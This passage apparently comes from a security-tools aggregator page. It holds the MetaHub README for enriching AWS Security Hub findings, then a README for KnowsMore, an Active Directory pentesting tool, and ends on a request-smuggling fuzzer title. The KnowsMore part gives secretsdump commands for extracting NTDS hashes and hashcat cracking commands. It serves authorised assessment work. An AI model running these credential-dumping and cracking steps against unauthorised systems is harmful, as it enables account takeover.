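print(findings_score(["HIGH", "LOW"]))  # 0.875, matching the example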

Architecture

MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates an impact score. Finally, it generates different outputs based on your needs.



Use Cases

Some use cases for MetaHub include:

  • MetaHub integration with Prowler as a local scanner for context enrichment
  • Automating Security Hub findings suppression based on Tagging
  • Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
  • Create enriched HTML reports for your findings that you can filter, sort, group, and download
  • Create Security Hub Insights based on MetaHub context

Features

MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation

MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:

  • Config: Fetches the most important configuration values from the affected resource.
  • Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
  • Tags: Queries tagging from affected resources
  • CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
  • Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.

MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations: for example, whether the resource is public, whether it is encrypted, whether it is part of a VPC, whether it is using a specific IAM role, and more. For more information, refer to Config filters and Tags filters.

But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.

If you prefer, with MetaHub you can enrich your findings back directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.

When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your finding with a custom text for future reference.

MetaHub supports different Output Modes, some of them JSON-based, like json-inventory, json-statistics, json-short, and json-full, but also powerful html, xlsx and csv outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources that adds the tags Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.

MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.

Customizing Configuration

MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.

Things you can customize:

  • lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more (a sketch of possible overrides follows this list).

  • lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs.

  • lib/config/resources.py: This file contains definitions for every resource type, such as which CloudTrail events to look for.
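
As a rough illustration, overriding defaults in lib/config/configuration.py might look like the sketch below. The variable names here are hypothetical placeholders, not the shipped option names; check the file itself for the real ones.

# Hypothetical sketch only -- the real option names live in lib/config/configuration.py
sh_default_filters = {"RecordState": ["ACTIVE"], "WorkflowStatus": ["NEW"]}  # default Security Hub filters
default_output_modes = ["json-short", "html"]  # outputs generated when --output-modes is not set
output_tag_columns = ["Owner", "Environment"]  # tag columns unrolled in HTML/CSV/XLSX reports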

Run with Python

MetaHub is a Python3 program. You need to have Python3 installed on your system along with the required Python modules described in the file requirements.txt.

Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).

Run it using Python Virtual Environment

  1. Clone the repository: git clone git@github.com:gabrielsoltz/metahub.git
  2. Change to the repository dir: cd metahub
  3. Create a virtual environment for this project: python3 -m venv venv/metahub
  4. Activate the virtual environment you just created: source venv/metahub/bin/activate
  5. Install Metahub requirements: pip3 install -r requirements.txt
  6. Run: ./metahub -h
  7. Deactivate your virtual environment after you finish with: deactivate

Next time, you only need steps 4 and 6 to use the program.

Alternatively, you can run this tool using Docker.

Run with Docker

MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.

The available tags for MetaHub container images are the following:

  • latest: in sync with master branch
  • <x.y.z>: you can find the releases here
  • stable: this tag always points to the latest release.

For running from the public registry, you can run the following command:

docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h

AWS credentials and Docker

If you are already authenticated to AWS on the host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this either by passing the necessary environment variables to the container or by mounting the credentials file.

For instance, you can run the following command:

docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
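
Alternatively, you can mount your credentials file instead of passing environment variables. A minimal sketch, assuming the container user's home directory is /root:

docker run -v ~/.aws:/root/.aws:ro -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h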

On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.

Build and Run Docker locally

You can also build it locally:

git clone git@github.com:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your Lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more; a hypothetical sketch follows.
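
As a purely hypothetical sketch, such an edit could hard-code the CLI options the function should run with (the variable name and structure are illustrative; check lib/lambda.py for the actual layout):

# Hypothetical sketch -- adapt to the real structure of lib/lambda.py
metahub_options = [
    "--sh-filters", "RecordState=ACTIVE", "WorkflowStatus=NEW",  # default query
    "--enrich-findings",  # write Context back to Security Hub
    "--no-actions-confirmation",  # Lambda runs unattended, so skip prompts
]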

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that aggregates findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role to the Lambda function configuration (see the previous step) and attaching the corresponding policy that allows the Lambda role to assume that role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that runs MetaHub for the selected findings. By default, the Lambda function runs MetaHub with the option --enrich-findings, which means it will update your findings with MetaHub outputs. If you want to change this, see Customize Lambda behaviour.

You first need to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then choose Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose Lambda function.
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use the aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in to. Just use the option --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, MetaHub uses the one configured in your environment. If you are using AWS Security Hub cross-Region aggregation, use the aggregation Region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS account than the one where AWS Security Hub is running, or when running AWS Security Hub in a multiple-account setup. Both options must be used together. The role provided needs enough permissions to get and update findings in AWS Security Hub (if needed). If you don't specify --sh-account, MetaHub will assume the account you are logged in to. A combined example follows this list.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.
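
For example, a minimal sketch combining these options (the role name SecurityHubRole and the account ID are illustrative):

./metahub --sh-region us-east-1 --sh-account 012345678901 --sh-assume-role SecurityHubRole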

IAM Policy for Security Hub

This is the minimum IAM policy you need to read from and write to AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "securityhub:GetFindings",
        "securityhub:ListFindingAggregators",
        "securityhub:BatchUpdateFindings",
        "iam:ListAccountAliases"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}

Configuring Context

If you are running MetaHub for a multiple-account setup (AWS Security Hub is aggregating findings from multiple AWS accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect directly with the affected resources in the affected account. This role needs enough permissions to describe resources.
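
For example, a minimal sketch (the role name SecurityAuditRole is illustrative):

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW --mh-assume-role SecurityAuditRole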

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format; check with them, or open an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You can also combine AWS Security Hub findings with input ASFF files by specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters to filter findings, as that option relies on the AWS API. You also can't use the options --update-findings or --enrich-findings, as those findings do not exist in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want to generate only a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all finding titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType.

JSON-Full

Show all findings with all their data. Findings are organized by ResourceId (ARN). For each finding, you will also get SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn.

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. The output lists each field/value with its number of occurrences.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column.
  • You can group/ungroup findings.
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.


XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags, adding Owner and Environment as columns to your report, using:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI, but limited to the EQUALS comparison. If you need another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option overrides the default filters. If you want to keep the defaults, you need to specify them in addition to your own. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL

If a value contains spaces, specify it using double quotes: ProductName="Security Hub"

You can add as many different filters as you need to your query, and you can also repeat the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, such as EQUALS, PREFIX, NOT_EQUALS, or PREFIX_NOT_EQUALS. You can call your YAML file using the option --sh-template <FILE>; a hypothetical template sketch follows the example below.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metahub --sh-template templates/default.yml
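
As a purely hypothetical illustration, such a template might mirror the AWS CLI filter schema, pairing each key with a value and a comparison; check the files under templates/ (such as default.yml) for the actual format:

SeverityLabel:
  - Value: CRITICAL
    Comparison: EQUALS
RecordState:
  - Value: ACTIVE
    Comparison: EQUALS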

Config Filters

MetaHub supports Config filters (and associations) in the form of KEY=VALUE, where the value can only be True or False, using the option --mh-filters-config. You can use as many filters as you want, separated by spaces. If you specify more than one filter, you will get all resources that match all of the filters.

Config filters only support True or False values:

  • A Config filter set to True matches resources where the check is True or returns data.
  • A Config filter set to False matches resources where the check is False or returns no data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the affected AWS resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub queries Tags for the affected AWS resources based on the previous list of findings.
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update the workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) of your AWS Security Hub findings with a single command. Use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update; MetaHub splits your results into chunks of 100 items to work around this limitation and updates your findings regardless of the amount.
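
The batching pattern described above can be sketched generically with boto3 (this illustrates the 100-item chunking only; it is not MetaHub's actual code):

# Generic sketch of batching Security Hub updates in chunks of 100 (the API limit).
# Illustrative only; MetaHub implements its own version of this internally.
import boto3

def update_in_chunks(findings, status, note_text):
    client = boto3.client("securityhub")
    for i in range(0, len(findings), 100):
        chunk = findings[i:i + 100]  # at most 100 findings per API call
        client.batch_update_findings(
            FindingIdentifiers=[
                {"Id": f["Id"], "ProductArn": f["ProductArn"]} for f in chunk
            ],
            Workflow={"Status": status},
            Note={"Text": note_text, "UpdatedBy": "MetaHub"},
        )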

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW, I found two affected resources with three findings each, making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich your AWS Security Hub findings back with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub; MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters, using extra information that was not available in Security Hub before.

For example, suppose you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public (public=True) with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with security findings sometimes introduces the problems of Shadowing and Duplication.

Shadowing occurs when two checks refer to the same issue, but one is more generic than the other.

Duplication occurs when you use more than one scanner and the same issue is reported more than once.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default security standards, like AWS Foundational Security Best Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that the SG is not in use. In that case, Security Hub will show an additional, fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have four findings for one resource in your dashboard!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the affected resource, resulting in a single result, or one non-compliant resource.

You can now work in MetaHub with these four findings together as if they were one. For example, you can update the Workflow Status of all four findings using only one command: see Updating Workflow Status.

Contributing

You can follow this guide if you want to contribute to the Context module.



KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse password quality (length, lower case, upper case, digits, special and latin characters)
  • Analyse password similarity with the company and user names
  • Search for users, passwords and hashes
  • Export all cracked credentials directly to the BloodHound Neo4j database as 'owned objects'
  • Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords, like the output below.

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problems with dependency versions, check the Virtual ENV file.

Execution Flow

There is no mandatory order for importing data, but to get better data correlation we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data is stored in a SQLite database.

knowsmore --create-db

Importing BloodHound files

You can import full BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This way, you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: KnowsMore can import both BloodHound ZIP files and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of the bloodhound importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy has several benefits, such as being at least 10x faster than the original BloodHound user interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and the SYSTEM registry hive

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use secretsdump.py to extract the NTDS hashes with the command below

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that, import the generated file:

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

To crack the hashes, I usually use hashcat with the commands below.

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

Importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to the name of your company

Wipe sensitive data

As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and their respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During an assessment you may find user passwords in several ways; you can add them to the KnowsMore database:

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

For remote connections, make sure that the Neo4j database server accepts remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

By: Zion3R


